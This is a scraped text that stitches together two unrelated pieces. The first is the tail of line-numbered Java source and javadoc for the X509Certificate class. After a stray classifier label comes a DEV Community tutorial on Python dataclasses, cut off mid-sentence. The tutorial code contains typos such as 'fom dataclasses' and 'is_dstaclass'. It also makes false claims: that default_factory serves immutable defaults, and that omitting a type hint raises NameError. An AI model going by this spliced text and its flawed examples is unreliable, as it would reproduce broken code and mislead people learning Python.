ASN.1: 46 * <pre> 47 * Certificate ::= SEQUENCE { 48 * tbsCertificate TBSCertificate, 49 * signatureAlgorithm AlgorithmIdentifier, 50 * signature BIT STRING } 51 * </pre> 52 * <p> 53 * These certificates are widely used to support authentication and 54 * other functionality in Internet security systems. Common applications 55 * include Privacy Enhanced Mail (PEM), Transport Layer Security (SSL), 56 * code signing for trusted software distribution, and Secure Electronic 57 * Transactions (SET). 58 * <p> 59 * These certificates are managed and vouched for by <em>Certificate 60 * Authorities</em> (CAs). CAs are services which create certificates by 61 * placing data in the X.509 standard format and then digitally signing 62 * that data. CAs act as trusted third parties, making introductions 63 * between principals who have no direct knowledge of each other. 64 * CA certificates are either signed by themselves, or by some other 65 * CA such as a "root" CA. 66 * <p> 67 * More information can be found in 68 * <a href="http://tools.ietf.org/html/rfc5280">RFC 5280: Internet X.509 69 * Public Key Infrastructure Certificate and CRL Profile</a>. 70 * <p> 71 * The ASN.1 definition of {@code tbsCertificate} is: 72 * <pre> 73 * TBSCertificate ::= SEQUENCE { 74 * version [0] EXPLICIT Version DEFAULT v1, 75 * serialNumber CertificateSerialNumber, 76 * signature AlgorithmIdentifier, 77 * issuer Name, 78 * validity Validity, 79 * subject Name, 80 * subjectPublicKeyInfo SubjectPublicKeyInfo, 81 * issuerUniqueID [1] IMPLICIT UniqueIdentifier OPTIONAL, 82 * -- If present, version must be v2 or v3 83 * subjectUniqueID [2] IMPLICIT UniqueIdentifier OPTIONAL, 84 * -- If present, version must be v2 or v3 85 * extensions [3] EXPLICIT Extensions OPTIONAL 86 * -- If present, version must be v3 87 * } 88 * </pre> 89 * <p> 90 * Certificates are instantiated using a certificate factory. The following is 91 * an example of how to instantiate an X.509 certificate: 92 * <pre> 93 * try (InputStream inStream = new FileInputStream("fileName-of-cert")) { 94 * CertificateFactory cf = CertificateFactory.getInstance("X.509"); 95 * X509Certificate cert = (X509Certificate)cf.generateCertificate(inStream); 96 * } 97 * </pre> 98 * 99 * @author Hemma Prafullchandra 100 * @since 1.2 101 * 102 * 103 * @see Certificate 104 * @see CertificateFactory 105 * @see X509Extension 106 */ 107 108 public abstract class X509Certificate extends Certificate 109 implements X509Extension { 110 111 private static final long serialVersionUID = -2491127588187038216L; 112 113 private transient X500Principal subjectX500Principal, issuerX500Principal; 114 115 /** 116 * Constructor for X.509 certificates. 117 */ 118 protected X509Certificate() { 119 super("X.509"); 120 } 121 122 /** 123 * Checks that the certificate is currently valid. It is if 124 * the current date and time are within the validity period given in the 125 * certificate. 126 * <p> 127 * The validity period consists of two date/time values: 128 * the first and last dates (and times) on which the certificate 129 * is valid. It is defined in 130 * ASN.1 as: 131 * <pre> 132 * validity Validity 133 * 134 * Validity ::= SEQUENCE { 135 * notBefore CertificateValidityDate, 136 * notAfter CertificateValidityDate } 137 * 138 * CertificateValidityDate ::= CHOICE { 139 * utcTime UTCTime, 140 * generalTime GeneralizedTime } 141 * </pre> 142 * 143 * @exception CertificateExpiredException if the certificate has expired. 144 * @exception CertificateNotYetValidException if the certificate is not 145 * yet valid. 146 */ 147 public abstract void checkValidity() 148 throws CertificateExpiredException, CertificateNotYetValidException; 149 150 /** 151 * Checks that the given date is within the certificate's 152 * validity period. In other words, this determines whether the 153 * certificate would be valid at the given date/time. 154 * 155 * @param date the Date to check against to see if this certificate 156 * is valid at that date/time. 157 * 158 * @exception CertificateExpiredException if the certificate has expired 159 * with respect to the {@code date} supplied. 160 * @exception CertificateNotYetValidException if the certificate is not 161 * yet valid with respect to the {@code date} supplied. 162 * 163 * @see #checkValidity() 164 */ 165 public abstract void checkValidity(Date date) 166 throws CertificateExpiredException, CertificateNotYetValidException; 167 168 /** 169 * Gets the {@code version} (version number) value from the 170 * certificate. 171 * The ASN.1 definition for this is: 172 * <pre> 173 * version [0] EXPLICIT Version DEFAULT v1 174 * 175 * Version ::= INTEGER { v1(0), v2(1), v3(2) } 176 * </pre> 177 * @return the version number, i.e. 1, 2 or 3. 178 */ 179 public abstract int getVersion(); 180 181 /** 182 * Gets the {@code serialNumber} value from the certificate. 183 * The serial number is an integer assigned by the certification 184 * authority to each certificate. It must be unique for each 185 * certificate issued by a given CA (i.e., the issuer name and 186 * serial number identify a unique certificate). 187 * The ASN.1 definition for this is: 188 * <pre> 189 * serialNumber CertificateSerialNumber 190 * 191 * CertificateSerialNumber ::= INTEGER 192 * </pre> 193 * 194 * @return the serial number. 195 */ 196 public abstract BigInteger getSerialNumber(); 197 198 /** 199 * <strong>Denigrated</strong>, replaced by {@linkplain 200 * #getIssuerX500Principal()}. This method returns the {@code issuer} 201 * as an implementation specific Principal object, which should not be 202 * relied upon by portable code. 203 * 204 * <p> 205 * Gets the {@code issuer} (issuer distinguished name) value from 206 * the certificate. The issuer name identifies the entity that signed (and 207 * issued) the certificate. 208 * 209 * <p>The issuer name field contains an 210 * X.500 distinguished name (DN). 211 * The ASN.1 definition for this is: 212 * <pre> 213 * issuer Name 214 * 215 * Name ::= CHOICE { RDNSequence } 216 * RDNSequence ::= SEQUENCE OF RelativeDistinguishedName 217 * RelativeDistinguishedName ::= 218 * SET OF AttributeValueAssertion 219 * 220 * AttributeValueAssertion ::= SEQUENCE { 221 * AttributeType, 222 * AttributeValue } 223 * AttributeType ::= OBJECT IDENTIFIER 224 * AttributeValue ::= ANY 225 * </pre> 226 * The {@code Name} describes a hierarchical name composed of 227 * attributes, 228 * such as country name, and corresponding values, such as US. 229 * The type of the {@code AttributeValue} component is determined by 230 * the {@code AttributeType}; in general it will be a 231 * {@code directoryString}. A {@code directoryString} is usually 232 * one of {@code PrintableString}, 233 * {@code TeletexString} or {@code UniversalString}. 234 * 235 * @return a Principal whose name is the issuer distinguished name. 236 */ 237 public abstract Principal getIssuerDN(); 238 239 /** 240 * Returns the issuer (issuer distinguished name) value from the 241 * certificate as an {@code X500Principal}. 242 * <p> 243 * It is recommended that subclasses override this method. 244 * 245 * @return an {@code X500Principal} representing the issuer 246 * distinguished name 247 * @since 1.4 248 */ 249 public X500Principal getIssuerX500Principal() { 250 if (issuerX500Principal == null) { 251 issuerX500Principal = X509CertImpl.getIssuerX500Principal(this); 252 } 253 return issuerX500Principal; 254 } 255 256 /** 257 * <strong>Denigrated</strong>, replaced by {@linkplain 258 * #getSubjectX500Principal()}. This method returns the {@code subject} 259 * as an implementation specific Principal object, which should not be 260 * relied upon by portable code. 261 * 262 * <p> 263 * Gets the {@code subject} (subject distinguished name) value 264 * from the certificate. If the {@code subject} value is empty, 265 * then the {@code getName()} method of the returned 266 * {@code Principal} object returns an empty string (""). 267 * 268 * <p> The ASN.1 definition for this is: 269 * <pre> 270 * subject Name 271 * </pre> 272 * 273 * <p>See {@link #getIssuerDN() getIssuerDN} for {@code Name} 274 * and other relevant definitions. 275 * 276 * @return a Principal whose name is the subject name. 277 */ 278 public abstract Principal getSubjectDN(); 279 280 /** 281 * Returns the subject (subject distinguished name) value from the 282 * certificate as an {@code X500Principal}. If the subject value 283 * is empty, then the {@code getName()} method of the returned 284 * {@code X500Principal} object returns an empty string (""). 285 * <p> 286 * It is recommended that subclasses override this method. 287 * 288 * @return an {@code X500Principal} representing the subject 289 * distinguished name 290 * @since 1.4 291 */ 292 public X500Principal getSubjectX500Principal() { 293 if (subjectX500Principal == null) { 294 subjectX500Principal = X509CertImpl.getSubjectX500Principal(this); 295 } 296 return subjectX500Principal; 297 } 298 299 /** 300 * Gets the {@code notBefore} date from the validity period of 301 * the certificate. 302 * The relevant ASN.1 definitions are: 303 * <pre> 304 * validity Validity 305 * 306 * Validity ::= SEQUENCE { 307 * notBefore CertificateValidityDate, 308 * notAfter CertificateValidityDate } 309 * 310 * CertificateValidityDate ::= CHOICE { 311 * utcTime UTCTime, 312 * generalTime GeneralizedTime } 313 * </pre> 314 * 315 * @return the start date of the validity period. 316 * @see #checkValidity 317 */ 318 public abstract Date getNotBefore(); 319 320 /** 321 * Gets the {@code notAfter} date from the validity period of 322 * the certificate. See {@link #getNotBefore() getNotBefore} 323 * for relevant ASN.1 definitions. 324 * 325 * @return the end date of the validity period. 326 * @see #checkValidity 327 */ 328 public abstract Date getNotAfter(); 329 330 /** 331 * Gets the DER-encoded certificate information, the 332 * {@code tbsCertificate} from this certificate. 333 * This can be used to verify the signature independently. 334 * 335 * @return the DER-encoded certificate information. 336 * @exception CertificateEncodingException if an encoding error occurs. 337 */ 338 public abstract byte[] getTBSCertificate() 339 throws CertificateEncodingException; 340 341 /** 342 * Gets the {@code signature} value (the raw signature bits) from 343 * the certificate. 344 * The ASN.1 definition for this is: 345 * <pre> 346 * signature BIT STRING 347 * </pre> 348 * 349 * @return the signature. 350 */ 351 public abstract byte[] getSignature(); 352 353 /** 354 * Gets the signature algorithm name for the certificate 355 * signature algorithm. An example is the string "SHA256withRSA". 356 * The ASN.1 definition for this is: 357 * <pre> 358 * signatureAlgorithm AlgorithmIdentifier 359 * 360 * AlgorithmIdentifier ::= SEQUENCE { 361 * algorithm OBJECT IDENTIFIER, 362 * parameters ANY DEFINED BY algorithm OPTIONAL } 363 * -- contains a value of the type 364 * -- registered for use with the 365 * -- algorithm object identifier value 366 * </pre> 367 * 368 * <p>The algorithm name is determined from the {@code algorithm} 369 * OID string. 370 * 371 * @return the signature algorithm name. 372 */ 373 public abstract String getSigAlgName(); 374 375 /** 376 * Gets the signature algorithm OID string from the certificate. 377 * An OID is represented by a set of nonnegative whole numbers separated 378 * by periods. 379 * For example, the string "1.2.840.10040.4.3" identifies the SHA-1 380 * with DSA signature algorithm defined in 381 * <a href="http://www.ietf.org/rfc/rfc3279.txt">RFC 3279: Algorithms and 382 * Identifiers for the Internet X.509 Public Key Infrastructure Certificate 383 * and CRL Profile</a>. 384 * 385 * <p>See {@link #getSigAlgName() getSigAlgName} for 386 * relevant ASN.1 definitions. 387 * 388 * @return the signature algorithm OID string. 389 */ 390 public abstract String getSigAlgOID(); 391 392 /** 393 * Gets the DER-encoded signature algorithm parameters from this 394 * certificate's signature algorithm. In most cases, the signature 395 * algorithm parameters are null; the parameters are usually 396 * supplied with the certificate's public key. 397 * If access to individual parameter values is needed then use 398 * {@link java.security.AlgorithmParameters AlgorithmParameters} 399 * and instantiate with the name returned by 400 * {@link #getSigAlgName() getSigAlgName}. 401 * 402 * <p>See {@link #getSigAlgName() getSigAlgName} for 403 * relevant ASN.1 definitions. 404 * 405 * @return the DER-encoded signature algorithm parameters, or 406 * null if no parameters are present. 407 */ 408 public abstract byte[] getSigAlgParams(); 409 410 /** 411 * Gets the {@code issuerUniqueID} value from the certificate. 412 * The issuer unique identifier is present in the certificate 413 * to handle the possibility of reuse of issuer names over time. 414 * RFC 5280 recommends that names not be reused and that 415 * conforming certificates not make use of unique identifiers. 416 * Applications conforming to that profile should be capable of 417 * parsing unique identifiers and making comparisons. 418 * 419 * <p>The ASN.1 definition for this is: 420 * <pre> 421 * issuerUniqueID [1] IMPLICIT UniqueIdentifier OPTIONAL 422 * 423 * UniqueIdentifier ::= BIT STRING 424 * </pre> 425 * 426 * @return the issuer unique identifier or null if it is not 427 * present in the certificate. 428 */ 429 public abstract boolean[] getIssuerUniqueID(); 430 431 /** 432 * Gets the {@code subjectUniqueID} value from the certificate. 433 * 434 * <p>The ASN.1 definition for this is: 435 * <pre> 436 * subjectUniqueID [2] IMPLICIT UniqueIdentifier OPTIONAL 437 * 438 * UniqueIdentifier ::= BIT STRING 439 * </pre> 440 * 441 * @return the subject unique identifier or null if it is not 442 * present in the certificate. 443 */ 444 public abstract boolean[] getSubjectUniqueID(); 445 446 /** 447 * Gets a boolean array representing bits of 448 * the {@code KeyUsage} extension, (OID = 2.5.29.15). 449 * The key usage extension defines the purpose (e.g., encipherment, 450 * signature, certificate signing) of the key contained in the 451 * certificate. 452 * The ASN.1 definition for this is: 453 * <pre> 454 * KeyUsage ::= BIT STRING { 455 * digitalSignature (0), 456 * nonRepudiation (1), 457 * keyEncipherment (2), 458 * dataEncipherment (3), 459 * keyAgreement (4), 460 * keyCertSign (5), 461 * cRLSign (6), 462 * encipherOnly (7), 463 * decipherOnly (8) } 464 * </pre> 465 * RFC 5280 recommends that when used, this be marked 466 * as a critical extension. 467 * 468 * @return the KeyUsage extension of this certificate, represented as 469 * an array of booleans. The order of KeyUsage values in the array is 470 * the same as in the above ASN.1 definition. The array will contain a 471 * value for each KeyUsage defined above. If the KeyUsage list encoded 472 * in the certificate is longer than the above list, it will not be 473 * truncated. Returns null if this certificate does not 474 * contain a KeyUsage extension. 475 */ 476 public abstract boolean[] getKeyUsage(); 477 478 /** 479 * Gets an unmodifiable list of Strings representing the OBJECT 480 * IDENTIFIERs of the {@code ExtKeyUsageSyntax} field of the 481 * extended key usage extension, (OID = 2.5.29.37). It indicates 482 * one or more purposes for which the certified public key may be 483 * used, in addition to or in place of the basic purposes 484 * indicated in the key usage extension field. The ASN.1 485 * definition for this is: 486 * <pre> 487 * ExtKeyUsageSyntax ::= SEQUENCE SIZE (1..MAX) OF KeyPurposeId 488 * 489 * KeyPurposeId ::= OBJECT IDENTIFIER 490 * </pre> 491 * 492 * Key purposes may be defined by any organization with a 493 * need. Object identifiers used to identify key purposes shall be 494 * assigned in accordance with IANA or ITU-T Rec. X.660 | 495 * ISO/IEC/ITU 9834-1. 496 * <p> 497 * This method was added to version 1.4 of the Java 2 Platform Standard 498 * Edition. In order to maintain backwards compatibility with existing 499 * service providers, this method is not {@code abstract} 500 * and it provides a default implementation. Subclasses 501 * should override this method with a correct implementation. 502 * 503 * @return the ExtendedKeyUsage extension of this certificate, 504 * as an unmodifiable list of object identifiers represented 505 * as Strings. Returns null if this certificate does not 506 * contain an ExtendedKeyUsage extension. 507 * @throws CertificateParsingException if the extension cannot be decoded 508 * @since 1.4 509 */ 510 public List<String> getExtendedKeyUsage() throws CertificateParsingException { 511 return X509CertImpl.getExtendedKeyUsage(this); 512 } 513 514 /** 515 * Gets the certificate constraints path length from the 516 * critical {@code BasicConstraints} extension, (OID = 2.5.29.19). 517 * <p> 518 * The basic constraints extension identifies whether the subject 519 * of the certificate is a Certificate Authority (CA) and 520 * how deep a certification path may exist through that CA. The 521 * {@code pathLenConstraint} field (see below) is meaningful 522 * only if {@code cA} is set to TRUE. In this case, it gives the 523 * maximum number of CA certificates that may follow this certificate in a 524 * certification path. A value of zero indicates that only an end-entity 525 * certificate may follow in the path. 526 * <p> 527 * The ASN.1 definition for this is: 528 * <pre> 529 * BasicConstraints ::= SEQUENCE { 530 * cA BOOLEAN DEFAULT FALSE, 531 * pathLenConstraint INTEGER (0..MAX) OPTIONAL } 532 * </pre> 533 * 534 * @return the value of {@code pathLenConstraint} if the 535 * BasicConstraints extension is present in the certificate and the 536 * subject of the certificate is a CA, otherwise -1. 537 * If the subject of the certificate is a CA and 538 * {@code pathLenConstraint} does not appear, 539 * {@code Integer.MAX_VALUE} is returned to indicate that there is no 540 * limit to the allowed length of the certification path. 541 */ 542 public abstract int getBasicConstraints(); 543 544 /** 545 * Gets an immutable collection of subject alternative names from the 546 * {@code SubjectAltName} extension, (OID = 2.5.29.17). 547 * <p> 548 * The ASN.1 definition of the {@code SubjectAltName} extension is: 549 * <pre> 550 * SubjectAltName ::= GeneralNames 551 * 552 * GeneralNames :: = SEQUENCE SIZE (1..MAX) OF GeneralName 553 * 554 * GeneralName ::= CHOICE { 555 * otherName [0] OtherName, 556 * rfc822Name [1] IA5String, 557 * dNSName [2] IA5String, 558 * x400Address [3] ORAddress, 559 * directoryName [4] Name, 560 * ediPartyName [5] EDIPartyName, 561 * uniformResourceIdentifier [6] IA5String, 562 * iPAddress [7] OCTET STRING, 563 * registeredID [8] OBJECT IDENTIFIER} 564 * </pre> 565 * <p> 566 * If this certificate does not contain a {@code SubjectAltName} 567 * extension, {@code null} is returned. Otherwise, a 568 * {@code Collection} is returned with an entry representing each 569 * {@code GeneralName} included in the extension. Each entry is a 570 * {@code List} whose first entry is an {@code Integer} 571 * (the name type, 0-8) and whose second entry is a {@code String} 572 * or a byte array (the name, in string or ASN.1 DER encoded form, 573 * respectively). 574 * <p> 575 * <a href="http://www.ietf.org/rfc/rfc822.txt">RFC 822</a>, DNS, and URI 576 * names are returned as {@code String}s, 577 * using the well-established string formats for those types (subject to 578 * the restrictions included in RFC 5280). IPv4 address names are 579 * returned using dotted quad notation. IPv6 address names are returned 580 * in the form "a1:a2:...:a8", where a1-a8 are hexadecimal values 581 * representing the eight 16-bit pieces of the address. OID names are 582 * returned as {@code String}s represented as a series of nonnegative 583 * integers separated by periods. And directory names (distinguished names) 584 * are returned in <a href="http://www.ietf.org/rfc/rfc2253.txt"> 585 * RFC 2253</a> string format. No standard string format is 586 * defined for otherNames, X.400 names, EDI party names, or any 587 * other type of names. They are returned as byte arrays 588 * containing the ASN.1 DER encoded form of the name. 589 * <p> 590 * Note that the {@code Collection} returned may contain more 591 * than one name of the same type. Also, note that the returned 592 * {@code Collection} is immutable and any entries containing byte 593 * arrays are cloned to protect against subsequent modifications. 594 * <p> 595 * This method was added to version 1.4 of the Java 2 Platform Standard 596 * Edition. In order to maintain backwards compatibility with existing 597 * service providers, this method is not {@code abstract} 598 * and it provides a default implementation. Subclasses 599 * should override this method with a correct implementation. 600 * 601 * @return an immutable {@code Collection} of subject alternative 602 * names (or {@code null}) 603 * @throws CertificateParsingException if the extension cannot be decoded 604 * @since 1.4 605 */ 606 public Collection<List<?>> getSubjectAlternativeNames() 607 throws CertificateParsingException { 608 return X509CertImpl.getSubjectAlternativeNames(this); 609 } 610 611 /** 612 * Gets an immutable collection of issuer alternative names from the 613 * {@code IssuerAltName} extension, (OID = 2.5.29.18). 614 * <p> 615 * The ASN.1 definition of the {@code IssuerAltName} extension is: 616 * <pre> 617 * IssuerAltName ::= GeneralNames 618 * </pre> 619 * The ASN.1 definition of {@code GeneralNames} is defined 620 * in {@link #getSubjectAlternativeNames getSubjectAlternativeNames}. 621 * <p> 622 * If this certificate does not contain an {@code IssuerAltName} 623 * extension, {@code null} is returned. Otherwise, a 624 * {@code Collection} is returned with an entry representing each 625 * {@code GeneralName} included in the extension. Each entry is a 626 * {@code List} whose first entry is an {@code Integer} 627 * (the name type, 0-8) and whose second entry is a {@code String} 628 * or a byte array (the name, in string or ASN.1 DER encoded form, 629 * respectively). For more details about the formats used for each 630 * name type, see the {@code getSubjectAlternativeNames} method. 631 * <p> 632 * Note that the {@code Collection} returned may contain more 633 * than one name of the same type. Also, note that the returned 634 * {@code Collection} is immutable and any entries containing byte 635 * arrays are cloned to protect against subsequent modifications. 636 * <p> 637 * This method was added to version 1.4 of the Java 2 Platform Standard 638 * Edition. In order to maintain backwards compatibility with existing 639 * service providers, this method is not {@code abstract} 640 * and it provides a default implementation. Subclasses 641 * should override this method with a correct implementation. 642 * 643 * @return an immutable {@code Collection} of issuer alternative 644 * names (or {@code null}) 645 * @throws CertificateParsingException if the extension cannot be decoded 646 * @since 1.4 647 */ 648 public Collection<List<?>> getIssuerAlternativeNames() 649 throws CertificateParsingException { 650 return X509CertImpl.getIssuerAlternativeNames(this); 651 } 652 653 /** 654 * Verifies that this certificate was signed using the 655 * private key that corresponds to the specified public key. 656 * This method uses the signature verification engine 657 * supplied by the specified provider. Note that the specified 658 * Provider object does not have to be registered in the provider list. 659 * 660 * This method was added to version 1.8 of the Java Platform Standard 661 * Edition. In order to maintain backwards compatibility with existing 662 * service providers, this method is not {@code abstract} 663 * and it provides a default implementation. 664 * 665 * @param key the PublicKey used to carry out the verification. 666 * @param sigProvider the signature provider. 667 * 668 * @exception NoSuchAlgorithmException on unsupported signature 669 * algorithms. 670 * @exception InvalidKeyException on incorrect key. 671 * @exception SignatureException on signature errors. 672 * @exception CertificateException on encoding errors. 673 * @exception UnsupportedOperationException if the method is not supported 674 * @since 1.8 675 */ 676 public void verify(PublicKey key, Provider sigProvider) 677 throws CertificateException, NoSuchAlgorithmException, 678 InvalidKeyException, SignatureException { 679 String sigName = getSigAlgName(); 680 Signature sig = (sigProvider == null) 681 ? Signature.getInstance(sigName) 682 : Signature.getInstance(sigName, sigProvider); 683 684 try { 685 SignatureUtil.initVerifyWithParam(sig, key, 686 SignatureUtil.getParamSpec(sigName, getSigAlgParams())); 687 } catch (ProviderException e) { 688 throw new CertificateException(e.getMessage(), e.getCause()); 689 } catch (InvalidAlgorithmParameterException e) { 690 throw new CertificateException(e); 691 } 692 693 byte[] tbsCert = getTBSCertificate(); 694 sig.update(tbsCert, 0, tbsCert.length); 695 696 if (sig.verify(getSignature()) == false) { 697 throw new SignatureException("Signature does not match."); 698 } 699 } 700 }
__label__pos
0.999419
DEV Community loading... Cover image for Python Fundamentals: Everything you need to know about dataclasses Python Fundamentals: Everything you need to know about dataclasses Josue Balandrano Coronel Software is more than writing code Originally published at rmcomplexity.com Updated on ・18 min read Python data classes makes it super easy to write better classes by automatically implementing handy dunder methods like __init__, __str__ (string representation) or __eq__ (equals == operator). Data classes also make it easier to create frozen (immutable) instances, serialize instances and enforce type hints usage. What's in this article: The main parts of a data class are: • @dataclass decorator which returns the same defined class but modified • field function which allow for per-field customizations. Note: throughout this article we will be using different variations of this Response class. This class is meant to be a simplified representation of an HTTP response. How to create a data class To create a data class all we need to do is use the @dataclass decorator on a custom class like this: fom dataclasses import dataclass @dataclass class Response: status: int body: str Enter fullscreen mode Exit fullscreen mode The previous example creates a Response class with a status and body attributes. The @dataclass decorator by default gives us these benefits: • Automatic creation of the following dunder methods: 1. __init__ 2. __repr__ 3. __eq__ 4. __str__ • Enforcing type hints usage. If a field in a data class is defined without a type hint a NameError exception is raised. • @dataclass does not create a new class, it returns the same defined class. This allows for anything you could do in a regular class to be valid within a data class. We can appreciate data classes' benefits by taking a look at the previously defined Response class. Instance initialization: >>> resp = Response(status=200, body="OK") Enter fullscreen mode Exit fullscreen mode Correct representation of a class: >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> resp = Response(status=200, body="OK") >>> logging.info(resp) ... INFO:root:Response(status=200, body='OK') Enter fullscreen mode Exit fullscreen mode Instance equality >>> resp_ok = Response(status=200, body="OK") >>> resp_500 = Response(status=500, body="Error") >>> resp_200 = Response(status=200, body="OK") >>> resp_ok == resp_500 ... False >>> resp_ok == resp_200 ... True Enter fullscreen mode Exit fullscreen mode Note: we can customize the implementation of each dunder method. We'll see how later in this article. Field definition There are two ways of defining a field in a data class. 1. Using type hints and an optional default value from dataclasses import dstaclass @dataclass class Response: body: str status: int = 200 Enter fullscreen mode Exit fullscreen mode The previous class can be instantiated by passing only the message value or both status and message >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response >>> resp_ok = Response(body="OK") >>> logging.info(resp_ok) ... INFO:root:Response(body='OK', status=200) >>> # Create 500 response >>> resp_error = Response(status=500, body="error") >>> logging.info(resp_error) ... INFO:root:Response(body='error', status=500) Enter fullscreen mode Exit fullscreen mode 1. Using the field method. This is recommended when there's a need for more fine grained configuration on a field. By using the field method we can: Specify a default value When using the field method we can specify a default value by passing a default parameter: from dataclasses import dataclass @dataclass class Response: body: str status: int = field(default=200) Enter fullscreen mode Exit fullscreen mode In Python it is not recommended to use mutable values as argument defaults. This means it's not a good idea to define a data class like this (the following example is not valid) from dataclasses import dataclass @dataclass class Response: status: int body: str headers: dict = {} Enter fullscreen mode Exit fullscreen mode If we could use the previous code every instance of response would share the same headers object and that's not good. Fortunately data classes help us prevent this by raising an error when something like the example above is used. And if we need to add an immutable object as a default value we can use default_factory. The default_factory value should be a function with no arguments. Commonly used functions include dict or list : from dataclasses import dataclass, field @dataclass class Response: status: int body: str headers: dict = field(default_factory=dict) Enter fullscreen mode Exit fullscreen mode We can then use this class like so: >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response >>> resp = Response(status=200, body="OK") >>> logging.info(resp) ... INFO:root:Response(status=200, body='OK', headers={}) Enter fullscreen mode Exit fullscreen mode Note: for mutable default values use default_factory Include or exclude fields in automatically implemented dunder methods By default every defined fields are used in __init__, __str__, __repr__, and __eq__. The field method allows to specify which fields are used when implementing the following dunder methods: __init__ from dataclasses import dataclass @dataclass class Response: body: str headers: dict = field(init=False, default_factory=dict) status: int = 200 Enter fullscreen mode Exit fullscreen mode This data class will implement an __init___ method like this one: def __init__(self, body:str, status: int=200): self.body = body self.status = status self.headers = dict() Enter fullscreen mode Exit fullscreen mode This version of the Response class will not allow for a headers value on initialization. Here's how we could use it: >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response >>> >>> resp = Response(body="Success") >>> logging.info(resp) ... INFO:root:Response(body='Success', headers={}, status=200) >>> >>> # passing a headers param on initialization will raise an srgument error. >>> resp = Response(body="Success", headers={}) ... TypeError: __init__() got an unexpected keyword argument 'headers' >>> >>> # 'headers' is an instance attribute and can be used after initialization. >>> resp.headers = {"Content-Type": "application/json"} >>> logging.info(resp) ... INFO:root:Response(body='Success', headers={'Content-Type': 'application/json'}, status=200) Enter fullscreen mode Exit fullscreen mode Note: Fields that are not used in __init__ method can also be populated after init using __post_init__. __repr__ and __str__ from dataclasses import dataclass @dataclass class Response: body: str headers: dict = field(repr=False, init=False, default_factory=dict) status: int = 200 Enter fullscreen mode Exit fullscreen mode Now, the Response class will not print the value of headers when an instance is printed. >>> resp = Response(body="Success") >>> logging.info(resp) ... INFO:root:Response(body='Success', status=200) Enter fullscreen mode Exit fullscreen mode __eq__ from dataclasses import dataclass, field @dataclass class Response: body: str headers: dict = field(compare=False, init=False, repr=False, default_factory=dict) status: int = 200 Enter fullscreen mode Exit fullscreen mode This version of the Response class will not take the headers value into consideration when comparing if an instance is equal to another. >>> resp_json = Response(body="Success") >>> resp_json.headers = {"Content-Type": "application/json"} >>> resp_xml = Response(body="Success") >>> resp_xml.headers = {"Content-Type": "application/xml"} >>> resp_json == resp_xml ... True Enter fullscreen mode Exit fullscreen mode Both objects are equal because only the status and body values are considered when checking for equality and not the headers value. Note: when setting compare to False on a field it will not be used to automatically implement any comparable methods (__lt__, __gt__, etc...). More on comparisons later. Add field specific metadata We can add metadata to a field. The metadata is a mapping and it's meant to be used by 3rd party libraries. The data classes implementation does not use field metadata at all. Note: If you decide to use field-specific metadata, be mindful, other 3rd party libraries could overwrite any value. It's recommended to use a specific key to avoid collisions. from dataclasses import dataclass, field from typing import Any @dataclass class Response: body: Any = field(metadata={"force_str": True}) headers: dict = field(init=False, repr=False, default_factory=dict) status: int = 200 Enter fullscreen mode Exit fullscreen mode This Response class assigns a mapping with the key force_str as metadata. The metadata mapping can be used as configuration to force using the string representation of whatever is passed as body. To access a field's metadata the fields method can be used. >>> from dataclasses import fields >>> resp = Response(body="Success") >>> fields(resp) ...(Field(name='body',type=typing.Any,default=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,default_factory=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,init=True,repr=True,hash=None,compare=True,metadata=mappingproxy({'force_str': True}),_field_type=_FIELD), Field(name='headers',type=<class 'dict'>,default=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,default_factory=<class 'dict'>,init=False,repr=False,hash=None,compare=True,metadata=mappingproxy({}),_field_type=_FIELD), Field(name='status',type=<class 'int'>,default=200,default_factory=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,init=True,repr=True,hash=None,compare=True,metadata=mappingproxy({}),_field_type=_FIELD)) Enter fullscreen mode Exit fullscreen mode The fields method returns a tuple of Fields objects. It can be used on an instance or a class. To retrieve the body field we can use a comprehension and next >>> body_field = next( (field for field in fields(resp) if field.name == "body"), None ) >>> logging.info(body_field) ... INFO:root:Field(name='body',type=typing.Any,default=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,default_factory=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,init=True,repr=True,hash=None,compare=True,metadata=mappingproxy({'force_str': True}),_field_type=_FIELD) >>> logging.info(body_field.metadata) ... INFO:root:{'force_str': True} Enter fullscreen mode Exit fullscreen mode Customize object initialization The @dataclass decorator automatically implements an __init__ method. By using __post_init__ we can add custom logic on initialization without having to re-implement __init__. from dataclasses import dataclass, field from typing import Any from sys import getsizeof @dataclass class Response: body: str headers: dict = field(init=False, compare=False, default_factory=dict) status: int = 200 def __post_init__(self): """Add a Content-Length header on init""" self.headers["Content-Length"] = getsizeof(self.body) Enter fullscreen mode Exit fullscreen mode When the previous class is instantiated the content length is automatically calculated. >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response >>> resp = Response("Success") >>> logging.info(resp) ... INFO:root:Response(body='Success', headers={'Content-Length': 56}, status=200) Enter fullscreen mode Exit fullscreen mode We can also access field specific metadata in __post_init__ from dataclasses import dataclass, is_dstaclass, asdict @dataclass class Response: body: Any = field(metadata={"force_str": True}) headers: dict = field(init=False, compare=False, default_factory=dict) status: int = 200 def stringify_body(self): """Returns a string representation of the value in body""" body = self.body if is_dataclass(body): body = asdict(body) if isinstance(body, dict): return json.dumps(body) if not isinstance(body, str): return str(body) return body def __post_init__(self): """Custom int logic. - Check if body is configured to force value as string - Calculate body's length and add corresponding header. """ body_field = self.__dataclass_fields__["body"] if body_field.metadata["force_str"]: self.body = self.stringify_body() self.headers["Content-Length"] = getsizeof(self.body) Enter fullscreen mode Exit fullscreen mode And we can use this class like this: >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response >>> resp = Response(body={"message": "Success"}) >>> logging.info(resp) ... INFO:root:Response(body='{"message": "Success"}', headers={'Content-Length': 71}, status=200) Enter fullscreen mode Exit fullscreen mode The body value is automatically serialized into a string and stored in the calss on initialization. The previous example is mainly to show custom initialization logic. In reality you might not want to store the string representation of a response body, instead it's better to make the class serializable. Note: you can use asdict to transform a data class into a dictionary, this is useful for string serialization. We can also specify fields which will not be attributes of an instance but will be passed onto the __post_init__ hook by using 